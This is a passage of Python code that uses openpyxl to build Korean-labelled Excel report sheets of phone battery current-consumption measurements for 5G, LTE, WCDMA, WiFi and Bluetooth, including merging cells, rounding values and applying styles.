sheet_out['A6'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '6'] = sheet_in[col+'10'].value\n sheet_out[col + '7'] = sheet_in[col+'11'].value\n\n # sheet row 8~9 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '8'] = sheet_in[col + '12'].value\n sheet_out[col + '9'] = sheet_in[col + '13'].value\n else:\n # row 8\n if self.isNumber(sheet_in[col + '12'].value):\n sheet_out[col + '8'] = self.check_num(round(float(sheet_in[col + '12'].value), 2))\n else:\n sheet_out[col + '8'] = self.check_empty(sheet_in[col + '12'].value)\n\n # row 9\n if self.isNumber(sheet_in[col + '13'].value):\n sheet_out[col + '9'] = self.check_num(round(float(sheet_in[col + '13'].value), 2))\n else:\n sheet_out[col + '9'] = self.check_empty(sheet_in[col + '13'].value)\n\n # sheet row 12~15 handle\n sheet_out.merge_cells('A10:A11')\n sheet_out['A10'] = '차수'\n sheet_out.merge_cells('B10:B11')\n sheet_out['B10'] = '시료번호'\n sheet_out.merge_cells('C10:C11')\n sheet_out['C10'] = '베터리용량'\n sheet_out.merge_cells('D10:D11')\n sheet_out['D10'] = '측정채널'\n\n sheet_out.merge_cells('E10:F10')\n sheet_out['E10'] = sheet_in['Q8'].value\n sheet_out.merge_cells('G10:H10')\n sheet_out['G10'] = sheet_in['S8'].value\n sheet_out.merge_cells('I10:J10')\n sheet_out['I10'] = sheet_in['U8'].value\n sheet_out.merge_cells('K10:L10')\n sheet_out['K10'] = sheet_in['W8'].value\n sheet_out.merge_cells('M10:N10')\n sheet_out['M10'] = sheet_in['Y8'].value\n sheet_out.merge_cells('O10:P10')\n sheet_out['O10'] = sheet_in['AA8'].value\n\n sheet_out.merge_cells('E11:F11')\n sheet_out['E11'] = sheet_in['Q9'].value\n sheet_out.merge_cells('G11:H11')\n sheet_out['G11'] = sheet_in['S9'].value\n sheet_out.merge_cells('I11:J11')\n sheet_out['I11'] = sheet_in['U9'].value\n sheet_out.merge_cells('K11:L11')\n sheet_out['K11'] = sheet_in['W9'].value\n sheet_out.merge_cells('M11:N11')\n sheet_out['M11'] = sheet_in['Y9'].value\n sheet_out.merge_cells('O11:P11')\n sheet_out['O11'] = sheet_in['AA9'].value\n\n # sheet row 12~13 handle\n sheet_out.merge_cells('A12:D13')\n sheet_out['A12'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n sheet_out[col + '12'] = sheet_in[col_out[i] + '10'].value\n sheet_out[col + '13'] = sheet_in[col_out[i] + '11'].value\n\n # sheet row 14~15 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '14'] = sheet_in[col + '12'].value\n sheet_out[col + '15'] = sheet_in[col + '13'].value\n else:\n # row 14\n if self.isNumber(sheet_in[col_out[i-4] + '12'].value):\n sheet_out[col + '14'] = self.check_num(round(float(sheet_in[col_out[i-4] + '12'].value), 2))\n else:\n sheet_out[col + '14'] = self.check_empty(sheet_in[col_out[i-4] + '12'].value)\n\n # row 15\n if self.isNumber(sheet_in[col_out[i-4] + '13'].value):\n sheet_out[col + '15'] = self.check_num(round(float(sheet_in[col_out[i-4] + '13'].value), 2))\n else:\n sheet_out[col + '15'] = self.check_empty(sheet_in[col_out[i-4] + '13'].value)\n\n # sheet row 17~19 handle\n sheet_out['A17'] = '▣ LTE 측정내역'\n sheet_out.merge_cells('A18:A19')\n sheet_out['A18'] = '차수'\n sheet_out.merge_cells('B18:B19')\n sheet_out['B18'] = '시료번호'\n sheet_out.merge_cells('C18:C19')\n sheet_out['C18'] = '베터리용량'\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = '측정채널'\n sheet_out.merge_cells('E18:H18')\n sheet_out['E18'] = sheet_in['E16'].value\n sheet_out.merge_cells('I18:L18')\n sheet_out['I18'] = sheet_in['I16'].value\n sheet_out.merge_cells('M18:P18')\n sheet_out['M18'] = sheet_in['M16'].value\n\n sheet_out.merge_cells('E19:F19')\n sheet_out['E19'] = sheet_in['E17'].value\n sheet_out.merge_cells('G19:H19')\n sheet_out['G19'] = sheet_in['G17'].value\n sheet_out.merge_cells('I19:J19')\n sheet_out['I19'] = sheet_in['I17'].value\n sheet_out.merge_cells('K19:L19')\n sheet_out['K19'] = sheet_in['K17'].value\n sheet_out.merge_cells('M19:N19')\n sheet_out['M19'] = sheet_in['M17'].value\n sheet_out.merge_cells('O19:P19')\n sheet_out['O19'] = sheet_in['O17'].value\n\n # sheet row 20~21 handle\n sheet_out.merge_cells('A20:D21')\n sheet_out['A20'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '20'] = sheet_in[col+'18'].value\n sheet_out[col + '21'] = sheet_in[col+'19'].value\n\n # sheet row 22~23 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '22'] = sheet_in[col + '12'].value\n sheet_out[col + '23'] = sheet_in[col + '13'].value\n else:\n # row 22\n if self.isNumber(sheet_in[col + '20'].value):\n sheet_out[col + '22'] = self.check_num(round(float(sheet_in[col + '20'].value), 2))\n else:\n sheet_out[col + '22'] = self.check_empty(sheet_in[col + '20'].value)\n\n # row 23\n if self.isNumber(sheet_in[col + '21'].value):\n sheet_out[col + '23'] = self.check_num(round(float(sheet_in[col + '21'].value), 2))\n else:\n sheet_out[col + '23'] = self.check_empty(sheet_in[col + '21'].value)\n\n # sheet row 24~25 handle\n sheet_out.merge_cells('A24:A25')\n sheet_out['A24'] = '차수'\n sheet_out.merge_cells('B24:B25')\n sheet_out['B24'] = '시료번호'\n sheet_out.merge_cells('C24:C25')\n sheet_out['C24'] = '베터리용량'\n sheet_out.merge_cells('D24:D25')\n sheet_out['D24'] = '측정채널'\n\n sheet_out.merge_cells('E24:F24')\n sheet_out['E24'] = sheet_in['Q16'].value\n sheet_out.merge_cells('G24:H24')\n sheet_out['G24'] = sheet_in['S16'].value\n sheet_out.merge_cells('I24:J24')\n sheet_out['I24'] = sheet_in['U16'].value\n sheet_out.merge_cells('K24:L24')\n sheet_out['K24'] = sheet_in['W16'].value\n\n sheet_out.merge_cells('E25:F25')\n sheet_out['E25'] = sheet_in['Q17'].value\n sheet_out.merge_cells('G25:H25')\n sheet_out['G25'] = sheet_in['S17'].value\n sheet_out.merge_cells('I25:J25')\n sheet_out['I25'] = sheet_in['U17'].value\n sheet_out.merge_cells('K25:L25')\n sheet_out['K25'] = sheet_in['W17'].value\n\n # sheet row 26~27 handle\n sheet_out.merge_cells('A26:D27')\n sheet_out['A26'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n sheet_out[col + '26'] = sheet_in[col_out[i] + '18'].value\n sheet_out[col + '27'] = sheet_in[col_out[i] + '19'].value\n\n # sheet row 28~29 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '28'] = sheet_in[col + '12'].value\n sheet_out[col + '29'] = sheet_in[col + '13'].value\n else:\n # row 28\n if self.isNumber(sheet_in[col_out[i-4] + '20'].value):\n sheet_out[col + '28'] = self.check_num(round(float(sheet_in[col_out[i-4] + '20'].value), 2))\n else:\n sheet_out[col + '28'] = self.check_empty(sheet_in[col_out[i-4] + '20'].value)\n # row 29\n if self.isNumber(sheet_in[col_out[i-4] + '21'].value):\n sheet_out[col + '29'] = self.check_num(round(float(sheet_in[col_out[i-4] + '21'].value), 2))\n else:\n sheet_out[col + '29'] = self.check_empty(sheet_in[col_out[i-4] + '21'].value)\n\n\n # sheet row 31~33 handle\n sheet_out['A31'] = '▣ WCDMA 측정내역'\n sheet_out.merge_cells('A32:A33')\n sheet_out['A32'] = '차수'\n sheet_out.merge_cells('B32:B33')\n sheet_out['B32'] = '시료번호'\n sheet_out.merge_cells('C32:C33')\n sheet_out['C32'] = '베터리용량'\n sheet_out.merge_cells('D32:D33')\n sheet_out['D32'] = '측정채널'\n\n sheet_out.merge_cells('E32:F32')\n sheet_out['E32'] = sheet_in['E24'].value\n sheet_out.merge_cells('G32:J32')\n sheet_out['G32'] = sheet_in['G24'].value\n sheet_out.merge_cells('K32:L32')\n sheet_out['K32'] = sheet_in['K24'].value\n\n sheet_out.merge_cells('E33:F33')\n sheet_out['E33'] = sheet_in['E25'].value\n sheet_out.merge_cells('G33:H33')\n sheet_out['G33'] = sheet_in['G25'].value\n sheet_out.merge_cells('I33:J33')\n sheet_out['I33'] = sheet_in['I25'].value\n sheet_out.merge_cells('K33:L33')\n sheet_out['K33'] = sheet_in['K25'].value\n\n # sheet row 34~35 handle\n sheet_out.merge_cells('A34:D35')\n sheet_out['A34'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n sheet_out[col + '34'] = sheet_in[col+'26'].value\n sheet_out[col + '35'] = sheet_in[col+'27'].value\n\n # sheet row 36~37 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '36'] = sheet_in[col + '12'].value\n sheet_out[col + '37'] = sheet_in[col + '13'].value\n else:\n # row 36\n if self.isNumber(sheet_in[col + '28'].value):\n sheet_out[col + '36'] = self.check_num(round(float(sheet_in[col + '28'].value), 2))\n else:\n sheet_out[col + '36'] = self.check_empty(sheet_in[col + '28'].value)\n # row 37\n if self.isNumber(sheet_in[col + '29'].value):\n sheet_out[col + '37'] = self.check_num(round(float(sheet_in[col + '29'].value), 2))\n else:\n sheet_out[col + '37'] = self.check_empty(sheet_in[col + '29'].value)\n\n # sheet row 39~41 handle\n sheet_out['A39'] = '▣ WiFi 측정내역'\n sheet_out.merge_cells('A40:A41')\n sheet_out['A40'] = '차수'\n sheet_out.merge_cells('B40:B41')\n sheet_out['B40'] = '시료번호'\n sheet_out.merge_cells('C40:C41')\n sheet_out['C40'] = '베터리용량'\n sheet_out.merge_cells('D40:D41')\n sheet_out['D40'] = '측정채널'\n\n sheet_out.merge_cells('E40:F40')\n sheet_out['E40'] = sheet_in['E32'].value\n sheet_out.merge_cells('G40:H40')\n sheet_out['G40'] = sheet_in['G32'].value\n sheet_out.merge_cells('I40:J40')\n sheet_out['I40'] = sheet_in['I32'].value\n sheet_out.merge_cells('K40:L40')\n sheet_out['K40'] = sheet_in['K32'].value\n sheet_out.merge_cells('M40:N40')\n sheet_out['M40'] = sheet_in['M32'].value\n\n sheet_out.merge_cells('E41:F41')\n sheet_out['E41'] = sheet_in['E33'].value\n sheet_out.merge_cells('G41:H41')\n sheet_out['G41'] = sheet_in['G33'].value\n sheet_out.merge_cells('I41:J41')\n sheet_out['I41'] = sheet_in['I33'].value\n sheet_out.merge_cells('K41:L41')\n sheet_out['K41'] = sheet_in['K33'].value\n sheet_out.merge_cells('M41:N41')\n sheet_out['M41'] = sheet_in['M33'].value\n\n # sheet row 42~43 handle\n sheet_out.merge_cells('A42:D43')\n sheet_out['A42'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '42'] = sheet_in[col+'34'].value\n sheet_out[col + '43'] = sheet_in[col+'35'].value\n\n # sheet row 44~45 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '44'] = sheet_in[col + '12'].value\n sheet_out[col + '45'] = sheet_in[col + '13'].value\n else:\n # row 44\n if self.isNumber(sheet_in[col + '36'].value):\n sheet_out[col + '44'] = self.check_num(round(float(sheet_in[col + '36'].value), 2))\n else:\n sheet_out[col + '44'] = self.check_empty(sheet_in[col + '36'].value)\n # row 45\n if self.isNumber(sheet_in[col + '37'].value):\n sheet_out[col + '45'] = self.check_num(round(float(sheet_in[col + '37'].value), 2))\n else:\n sheet_out[col + '45'] = self.check_empty(sheet_in[col + '37'].value)\n\n # sheet row 47~49 handle\n sheet_out['A47'] = '▣ BlueTooth 측정내역'\n sheet_out.merge_cells('A48:A49')\n sheet_out['A48'] = '차수'\n sheet_out.merge_cells('B48:B49')\n sheet_out['B48'] = '시료번호'\n sheet_out.merge_cells('C48:C49')\n sheet_out['C48'] = '베터리용량'\n sheet_out.merge_cells('D48:D49')\n sheet_out['D48'] = '측정채널'\n sheet_out.merge_cells('E48:N48')\n sheet_out['E48'] = sheet_in['E40'].value\n\n sheet_out.merge_cells('E49:F49')\n sheet_out['E49'] = sheet_in['E41'].value\n sheet_out.merge_cells('G49:H49')\n sheet_out['G49'] = sheet_in['G41'].value\n sheet_out.merge_cells('I49:J49')\n sheet_out['I49'] = sheet_in['I41'].value\n sheet_out.merge_cells('K49:L49')\n sheet_out['K49'] = sheet_in['K41'].value\n sheet_out.merge_cells('M49:N49')\n sheet_out['M49'] = sheet_in['M41'].value\n\n # sheet row 50~51 handle\n sheet_out.merge_cells('A50:D51')\n sheet_out['A50'] = 'SKT 기준'\n\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '50'] = sheet_in[col+'42'].value\n sheet_out[col + '51'] = sheet_in[col+'43'].value\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n # sheet row 52~53 handle\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '52'] = sheet_in[col + '12'].value\n sheet_out[col + '53'] = sheet_in[col + '13'].value\n else:\n # row 52\n if self.isNumber(sheet_in[col + '44'].value):\n sheet_out[col + '52'] = self.check_num(round(float(sheet_in[col + '44'].value), 2))\n else:\n sheet_out[col + '52'] = self.check_empty(sheet_in[col + '44'].value)\n # row 53\n if self.isNumber(sheet_in[col + '45'].value):\n sheet_out[col + '53'] = self.check_num(round(float(sheet_in[col + '45'].value), 2))\n else:\n sheet_out[col + '53'] = self.check_empty(sheet_in[col + '45'].value)\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:Z53\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A17'].alignment = self.top_alignment\n sheet_out['A31'].alignment = self.top_alignment\n sheet_out['A39'].alignment = self.top_alignment\n sheet_out['A47'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:P15\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A18:P23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A24:L29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A32:L37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A40:N45\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A48:N53\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:P53\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n sheet_width_list = [29.88, 11.38, 11.38, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11,\n 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '7'].fill = self.apricot_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.brown_fill\n sheet_out[col + '12'].fill = self.apricot_fill\n sheet_out[col + '13'].fill = self.apricot_fill\n sheet_out[col + '18'].fill = self.brown_fill\n sheet_out[col + '19'].fill = self.brown_fill\n sheet_out[col + '20'].fill = self.apricot_fill\n sheet_out[col + '21'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n sheet_out[col + '40'].fill = self.brown_fill\n sheet_out[col + '41'].fill = self.brown_fill\n sheet_out[col + '42'].fill = self.apricot_fill\n sheet_out[col + '43'].fill = self.apricot_fill\n sheet_out[col + '48'].fill = self.brown_fill\n sheet_out[col + '49'].fill = self.brown_fill\n sheet_out[col + '50'].fill = self.apricot_fill\n sheet_out[col + '51'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n sheet_out[col + '24'].fill = self.brown_fill\n sheet_out[col + '25'].fill = self.brown_fill\n sheet_out[col + '26'].fill = self.apricot_fill\n sheet_out[col + '27'].fill = self.apricot_fill\n sheet_out[col + '32'].fill = self.brown_fill\n sheet_out[col + '33'].fill = self.brown_fill\n sheet_out[col + '34'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.apricot_fill\n\n for i in [8, 9, 14, 15, 22, 23, 28, 29, 36, 37, 44, 45, 52, 53]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류(시간) Tab\n def time_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n\n # get data from wb_input\n sheet_in = wb_output['배터리소모전류 세부데이터']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류(시간)']\n target = sheet_in['A8'].value\n ref = sheet_in['A9'].value\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:H1')\n sheet_out['A1'] = '배터리소모전류 결과 (시간)'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G '\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = sheet_in['E4'].value\n sheet_out.merge_cells('D4:E4')\n sheet_out['D4'] = sheet_in['I4'].value\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = sheet_in['M4'].value\n\n sheet_out['B5'] = sheet_in['E5'].value\n sheet_out['C5'] = sheet_in['G5'].value\n sheet_out['D5'] = sheet_in['I5'].value\n sheet_out['E5'] = sheet_in['K5'].value\n sheet_out['F5'] = sheet_in['M5'].value\n sheet_out['G5'] = sheet_in['O5'].value\n sheet_out['H5'] = sheet_in['G11'].value\n\n # sheet row 6 handle\n sheet_out['A6'] = 'SKT 기준'\n sheet_out['B6'] = sheet_in['F6'].value\n sheet_out['C6'] = sheet_in['H6'].value\n sheet_out['D6'] = sheet_in['J6'].value\n sheet_out['E6'] = sheet_in['L6'].value\n sheet_out['F6'] = sheet_in['N6'].value\n sheet_out['G6'] = sheet_in['P6'].value\n sheet_out['H6'] = sheet_in['H12'].value\n\n # sheet row 7~8\n sheet_out['A7'] = target\n sheet_out['B7'] = sheet_in['F8'].value\n sheet_out['C7'] = sheet_in['H8'].value\n sheet_out['D7'] = sheet_in['J8'].value\n sheet_out['E7'] = sheet_in['L8'].value\n sheet_out['F7'] = sheet_in['N8'].value\n sheet_out['G7'] = sheet_in['P8'].value\n sheet_out['H7'] = sheet_in['H14'].value\n sheet_out['A8'] = ref\n sheet_out['B8'] = sheet_in['F9'].value\n sheet_out['C8'] = sheet_in['H9'].value\n sheet_out['D8'] = sheet_in['J9'].value\n sheet_out['E8'] = sheet_in['L9'].value\n sheet_out['F8'] = sheet_in['N9'].value\n sheet_out['G8'] = sheet_in['P9'].value\n sheet_out['H8'] = sheet_in['H15'].value\n\n # sheet row 9~10\n sheet_out.merge_cells('A9:A10')\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = sheet_in['I10'].value\n sheet_out['C9'] = sheet_in['K10'].value\n sheet_out['D9'] = sheet_in['M10'].value\n sheet_out['E9'] = '동영상'\n sheet_out['F9'] = sheet_in['E10'].value\n\n sheet_out['B10'] = sheet_in['I11'].value\n sheet_out['C10'] = sheet_in['K11'].value\n sheet_out['D10'] = sheet_in['M11'].value\n sheet_out['E10'] = '녹화'\n sheet_out['F10'] = sheet_in['E11'].value\n\n # sheet row 11 handle\n sheet_out['A11'] = 'SKT 기준'\n sheet_out['B11'] = sheet_in['J12'].value\n sheet_out['C11'] = sheet_in['L12'].value\n sheet_out['D11'] = sheet_in['N12'].value\n sheet_out['E11'] = sheet_in['P12'].value\n sheet_out['F11'] = sheet_in['F12'].value\n\n # sheet row 12~13\n sheet_out['A12'] = target\n sheet_out['B12'] = sheet_in['J14'].value\n sheet_out['C12'] = sheet_in['L14'].value\n sheet_out['D12'] = sheet_in['N14'].value\n sheet_out['E12'] = sheet_in['P14'].value\n sheet_out['F12'] = sheet_in['F14'].value\n sheet_out['A13'] = ref\n sheet_out['B13'] = sheet_in['F15'].value\n sheet_out['C13'] = sheet_in['H15'].value\n sheet_out['D13'] = sheet_in['J15'].value\n sheet_out['E13'] = sheet_in['L15'].value\n sheet_out['F13'] = sheet_in['N15'].value\n\n # sheet row 15~17 handle\n sheet_out['A15'] = '▣ LTE'\n sheet_out.merge_cells('A16:A17')\n sheet_out['A16'] = '구분'\n sheet_out.merge_cells('B16:C16')\n sheet_out['B16'] = sheet_in['E18'].value\n sheet_out.merge_cells('D16:E16')\n sheet_out['D16'] = sheet_in['I18'].value\n sheet_out.merge_cells('F16:H16')\n sheet_out['F16'] = sheet_in['M18'].value\n\n sheet_out['B17'] = sheet_in['E19'].value\n sheet_out['C17'] = sheet_in['G19'].value\n sheet_out['D17'] = sheet_in['I19'].value\n sheet_out['E17'] = sheet_in['K19'].value\n sheet_out['F17'] = sheet_in['M19'].value\n sheet_out['G17'] = sheet_in['O19'].value\n sheet_out['H17'] = sheet_in['E25'].value\n\n # sheet row 18 handle\n sheet_out['A18'] = 'SKT 기준'\n sheet_out['B18'] = sheet_in['F20'].value\n sheet_out['C18'] = sheet_in['H20'].value\n sheet_out['D18'] = sheet_in['J20'].value\n sheet_out['E18'] = sheet_in['L20'].value\n sheet_out['F18'] = sheet_in['N20'].value\n sheet_out['G18'] = sheet_in['P20'].value\n sheet_out['H18'] = sheet_in['F26'].value\n\n # sheet row 19~20\n sheet_out['A19'] = target\n sheet_out['B19'] = sheet_in['F22'].value\n sheet_out['C19'] = sheet_in['H22'].value\n sheet_out['D19'] = sheet_in['J22'].value\n sheet_out['E19'] = sheet_in['L22'].value\n sheet_out['F19'] = sheet_in['N22'].value\n sheet_out['G19'] = sheet_in['P22'].value\n sheet_out['H19'] = sheet_in['F28'].value\n sheet_out['A20'] = ref\n sheet_out['B20'] = sheet_in['F23'].value\n sheet_out['C20'] = sheet_in['H23'].value\n sheet_out['D20'] = sheet_in['J23'].value\n sheet_out['E20'] = sheet_in['L23'].value\n sheet_out['F20'] = sheet_in['N23'].value\n sheet_out['G20'] = sheet_in['P23'].value\n sheet_out['H20'] = sheet_in['F29'].value\n\n # sheet row 21~22\n sheet_out.merge_cells('A21:A22')\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = sheet_in['G24'].value\n sheet_out['C21'] = sheet_in['I24'].value\n sheet_out['D21'] = sheet_in['K24'].value\n\n sheet_out['B22'] = sheet_in['G25'].value\n sheet_out['C22'] = sheet_in['I25'].value\n sheet_out['D22'] = sheet_in['K25'].value\n\n # sheet row 23 handle\n sheet_out['A23'] = 'SKT 기준'\n sheet_out['B23'] = sheet_in['H26'].value\n sheet_out['C23'] = sheet_in['J26'].value\n sheet_out['D23'] = sheet_in['L26'].value\n\n # sheet row 24~25\n sheet_out['A24'] = target\n sheet_out['B24'] = sheet_in['H28'].value\n sheet_out['C24'] = sheet_in['J28'].value\n sheet_out['D24'] = sheet_in['L28'].value\n sheet_out['A25'] = ref\n sheet_out['B25'] = sheet_in['H29'].value\n sheet_out['C25'] = sheet_in['J29'].value\n sheet_out['D25'] = sheet_in['L29'].value\n\n # sheet row 27~29 handle\n sheet_out['A27'] = '▣ WCDMA'\n sheet_out.merge_cells('A28:A29')\n sheet_out['A28'] = '구분'\n sheet_out['B28'] = sheet_in['E32'].value\n sheet_out.merge_cells('C28:D28')\n sheet_out['C28'] = sheet_in['G32'].value\n sheet_out['E28'] = sheet_in['K32'].value\n\n sheet_out['B29'] = sheet_in['E33'].value\n sheet_out['C29'] = sheet_in['G33'].value\n sheet_out['D29'] = sheet_in['I33'].value\n sheet_out['E29'] = sheet_in['K33'].value\n\n # sheet row 30 handle\n sheet_out['A30'] = 'SKT 기준'\n sheet_out['B30'] = sheet_in['F34'].value\n sheet_out['C30'] = sheet_in['H34'].value\n sheet_out['D30'] = sheet_in['J34'].value\n sheet_out['E30'] = sheet_in['L34'].value\n\n # sheet row 31~32\n sheet_out['A31'] = target\n sheet_out['B31'] = sheet_in['F36'].value\n sheet_out['C31'] = sheet_in['H36'].value\n sheet_out['D31'] = sheet_in['J36'].value\n sheet_out['E31'] = sheet_in['L36'].value\n sheet_out['A32'] = ref\n sheet_out['B32'] = sheet_in['F37'].value\n sheet_out['C32'] = sheet_in['H37'].value\n sheet_out['D32'] = sheet_in['J37'].value\n sheet_out['E32'] = sheet_in['L37'].value\n\n\n # sheet row 34~36 handle\n sheet_out['A34'] = '▣ WiFi'\n sheet_out.merge_cells('A35:A36')\n sheet_out['A35'] = '구분'\n sheet_out.merge_cells('B35:C35')\n sheet_out['B35'] = sheet_in['E40'].value\n sheet_out['D35'] = sheet_in['I40'].value\n sheet_out['E35'] = sheet_in['K40'].value\n sheet_out['F35'] = sheet_in['M40'].value\n\n sheet_out['B36'] = sheet_in['E41'].value\n sheet_out['C36'] = sheet_in['G41'].value\n sheet_out['D36'] = sheet_in['I41'].value\n sheet_out['E36'] = sheet_in['K41'].value\n sheet_out['F36'] = sheet_in['M41'].value\n\n # sheet row 37 handle\n sheet_out['A37'] = 'SKT 기준'\n sheet_out['B37'] = sheet_in['F42'].value\n sheet_out['C37'] = sheet_in['H42'].value\n sheet_out['D37'] = sheet_in['J42'].value\n sheet_out['E37'] = sheet_in['L42'].value\n sheet_out['F37'] = sheet_in['N42'].value\n\n # sheet row 38~39\n sheet_out['A38'] = target\n sheet_out['B38'] = sheet_in['F44'].value\n sheet_out['C38'] = sheet_in['H44'].value\n sheet_out['D38'] = sheet_in['J44'].value\n sheet_out['E38'] = sheet_in['L44'].value\n sheet_out['F38'] = sheet_in['N44'].value\n sheet_out['A39'] = ref\n sheet_out['B39'] = sheet_in['F45'].value\n sheet_out['C39'] = sheet_in['H45'].value\n sheet_out['D39'] = sheet_in['J45'].value\n sheet_out['E39'] = sheet_in['L45'].value\n sheet_out['F39'] = sheet_in['N45'].value\n\n # sheet row 41~43 handle\n sheet_out['A41'] = '▣ Bluetooth'\n sheet_out.merge_cells('A42:A43')\n sheet_out['A42'] = '구분'\n sheet_out.merge_cells('B42:F42')\n sheet_out['B42'] = sheet_in['E48'].value\n\n sheet_out['B43'] = sheet_in['E49'].value\n sheet_out['C43'] = sheet_in['G49'].value\n sheet_out['D43'] = sheet_in['I49'].value\n sheet_out['E43'] = sheet_in['K49'].value\n sheet_out['F43'] = sheet_in['M49'].value\n\n # sheet row 44 handle\n sheet_out['A44'] = 'SKT 기준'\n sheet_out['B44'] = sheet_in['F50'].value\n sheet_out['C44'] = sheet_in['H50'].value\n sheet_out['D44'] = sheet_in['J50'].value\n sheet_out['E44'] = sheet_in['L50'].value\n sheet_out['F44'] = sheet_in['N50'].value\n\n # sheet row 45~46\n sheet_out['A45'] = target\n sheet_out['B45'] = sheet_in['F52'].value\n sheet_out['C45'] = sheet_in['H52'].value\n sheet_out['D45'] = sheet_in['J52'].value\n sheet_out['E45'] = sheet_in['L52'].value\n sheet_out['F45'] = sheet_in['N52'].value\n sheet_out['A46'] = ref\n sheet_out['B46'] = sheet_in['F53'].value\n sheet_out['C46'] = 